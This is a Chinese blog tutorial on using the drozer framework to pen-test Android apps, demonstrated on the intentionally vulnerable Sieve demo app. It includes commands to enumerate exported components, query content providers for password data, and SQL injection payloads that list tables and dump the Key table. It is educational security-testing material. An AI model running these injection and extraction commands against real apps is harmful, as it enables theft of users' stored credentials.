android渗透测试工具drozer,利用drozer进行Android渗透测试

最新推荐文章于 2024-09-21 21:19:11 发布
最新推荐文章于 2024-09-21 21:19:11 发布
阅读量923 收藏 3
点赞数
文章标签: android渗透测试工具drozer

一、安装与启动

1. 安装

第一步:从http://mwr.to/drozer下载Drozer (Windows Installer)

第二步:在Android设备中安装agent.apk

adb install agent.apk

2. 启动

第一步:在PC上使用adb进行端口转发,转发到Drozer使用的端口31415

adb forward tcp:31415 tcp:31415

第二步:在Android设备上开启Drozer Agent

选择embedded server-enable

第三步:在PC上开启Drozer console

drozer console connect

二、测试步骤

1.获取包名

dz> run app.package.list -f sieve

com.mwr.example.sieve

2.获取应用的基本信息

run app.package.info -a com.mwr.example.sieve

3.确定攻击面

run app.package.attacksurface com.mwr.example.sieve

4.Activity

(1)获取activity信息

run app.activity.info -a com.mwr.example.sieve

(2)启动activity

run app.activity.start --component com.mwr.example.sieve

dz> help app.activity.start

usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY]

[--component PACKAGE COMPONENT] [--data-uri DATA_URI]

[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]

[--mimetype MIMETYPE]

5.Content Provider

(1)获取Content Provider信息

run app.provider.info -a com.mwr.example.sieve

(2)Content Providers(数据泄露)

先获取所有可以访问的Uri:

run scanner.provider.finduris -a com.mwr.example.sieve

获取各个Uri的数据:

run app.provider.query

content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

查询到数据说明存在漏洞

(3)Content Providers(SQL注入)

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

报错则说明存在SQL注入。

列出所有表:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

获取某个表(如Key)中的数据:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

(4)同时检测SQL注入和目录遍历

run scanner.provider.injection -a com.mwr.example.sieve

run scanner.provider.traversal -a com.mwr.example.sieve

21/212>

函明
关注
Android安全测试框架Drozer(使用篇)
键盘的起始页
09-28 3407
一、运行APP 在模拟器中运行drozer Agent App,并打开Embbdded Server。 二、ADB查看模拟器 打开命令行工具,并cd切换到安卓模拟器的安装路径D:\Program Files\Microvirt\MEmu,运行adb devices命令,查看是否能看到模拟器。如果看不到,重启模拟器试试。 三、进入Drozer控制台 使用 adb 进行端口转发转发到上边Drozer使用的端口 31415,并进入Drozer 控制台: adb forward tcp:314.
Android渗透测试工具包
03-23
Android渗透测试工具包
drozer-Android安全测试基本使用教程(Windows10)_drozer官网
最新发布
2401_87378716的博客
09-21 1262
首先,我们需要设置一个合适的端口,以便我们的PC可以连接到由模拟器内部的代理,或手机上的代理。上面结果说明我们有很多潜在的问题,这个app上的 ‘exports’ 有的几个让其他应用程序可以访问的activities(应用程序使用的屏幕)、内容提供者(数据库对象)、服务(后台工作者)。(1)安装好后,打开sieve,第一次进入需要输入16位的密码和确认密码,提交后需要创建4位数的PIN(我的密码为1234567890123456,PIN为1234)这很好,但是我们可以通过它导出的服务完全妥协。
Android渗透测试工具之Drozer-安装
y995zq的博客
01-31 1495
drozer(以前称为 Mercury)是领先的 Android 安全测试框架。drozer 允许您通过扮演应用程序的角色并与 Dalvik VM、其他应用程序的 IPC 端点和底层操作系统交互来搜索应用程序和设备中的安全漏洞。drozer 提供的工具可帮助您使用、共享和了解公共 Android 漏洞。它可以帮助您通过利用或社会工程将 drozer 代理部署到设备。
Android App渗透测试--Drozer
weixin_43954270的博客
11-28 431
Drozer是一款领先的Android安全测试框架,可以发现Android应用程序暴露的攻击表面并与其进行交互,尽可能点对点发现Android漏洞,识别组织中易受攻击的设备,并进行远程攻击,Drozer既可以在Android模拟器上运行,也可以在实际设备上运行,可以免费从官网下载工具。(5)使用app.provider.info模块查看content provider组件信息。
Android渗透测试工具
hungryfoolisher的博客
07-03 783
参考: FreeBuf: Android渗透测试工具大合集
利用drozer进行Android渗透测试
hyb648115428的博客
03-14 381
一、安装与启动 1.安装 第一步:从http://mwr.to/drozer下载Drozer(WindowsInstaller) 第二步:在Android设备中安装agent.apk adbinstallagent.apk 2.启动 第一步:在PC上使用adb进行端口转发转发Drozer使用的端口31415 adb forward tcp:31415 tcp:3...
drozer-工具Android渗透工具.zip
06-05
**Android渗透测试drozer工具详解** 在网络安全领域,Android渗透测试是确保移动应用程序安全性的关键环节。Android作为全球最广泛使用的操作系统之一,其安全性备受关注。为了检测潜在的漏洞和安全风险,开发者...
android渗透测试指导及其工具
03-26
本文将深入探讨Android渗透测试的关键概念、常用工具及实践方法。 首先,理解渗透测试的基本流程是必要的。渗透测试通常包括五个阶段:信息收集、漏洞扫描、漏洞分析、攻击实施和报告编写。在Android环境中,这可能...
Android渗透测试便携集成环境
02-06
它是同类 Android 安全分析工具之一,是 Android 应用程序安全评估、Android 取证、Android 恶意软件分析所需的所有工具的一站式解决方案。 工具包含: Android Debug Bridge Apktool AndroBugs Framework ...
App安全性测试工具drozer
10-17
drozer是一款强大的安全测试工具,主要针对Android和iOS平台的应用程序(App)进行安全评估。它为安全研究人员和移动应用测试者提供了深入的洞察力,帮助他们发现并修复潜在的安全漏洞。drozer的设计理念是通过模拟...
安卓渗透测试中常用的一些工具
weixin_51725318的博客
07-26 614
安卓渗透测试中常用的一些工具
安卓渗透测试工具---drozer使用
Bird&Bird
11-20 1781
目录drozer下载drozer安装drozer使用建立手机端和PC端的连接确定攻击面测试activities exported (容易绕过登陆验证)测试 content provider(易造成数据库泄露,sql注入等问题)利用暴露的content provider进行sql注入从File System-backed Content Providers获取信息测试services exported (权限提升)测试broadcast receivers exported(拒绝服务) drozer下载 下载
Android App渗透测试工具drozer,Qark,Androguard
weixin_30594001的博客
02-26 694
一. drozer简介 drozer(以前称为Mercury)是一款Android安全测试框架。 drozer允许您通过承担应用程序的角色并与Dalvik VM,其他应用程序的IPC端点和底层操作系统进行交互来搜索应用程序和设备中的安全漏洞。 drozer提供工具来帮助您使用,共享和理解公共Android漏洞。它可以帮助您通过开发或社会工程将drozer Agent部署到设备。...
安卓渗透测试工具Drozer学习笔记
weixin_30768661的博客
08-09 251
下载,并安装。 pip安装即可,安装完成后可能会出现缺少twisted依赖库的问题 ➜ vul git:(master) ✗ drozer console connect drozer Server requires Twisted to run. Run 'pip install twisted' to fetch this dependency. 安装twisted时,...
利用drozer进行Android渗透测试 - AndroSecurity
qiujiwuhen00的博客
04-05 661
利用drozer进行Android渗透测试 - AndroSecurity 时间 2014-08-12 01:10:00 博客园-原创精华区 原文  http://www.cnblogs.com/goodhacker/p/3906180.html 主题 Drozer Android 渗透测试 一、安装与启动 1. 安装   第一步:从 http
安卓渗透测试常用工具大合集
Cairo_A的博客
06-10 2207
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。Android传承着Linux的血统,无疑使渗透 从机器端到各种终端,使用起来更加方便,工具集中了众多方法,大大提高了渗透的效率。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
【建议收藏】Android和iOS逆向分析/安全测试/渗透测试工具(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
06-20 1146
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…2.Needle是一个开源的模块化框架,用于简化对iOS应用程序进行安全评估的过程,包括二进制分析、静态代码分析、使用Cycript和Frida挂钩的运行时操作等。5.Frida工具包使用客户端-服务器模型工作,让您不仅可以在Android上注入正在运行的进程,还可以在iOS、Windows和Mac上注入运行的进程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值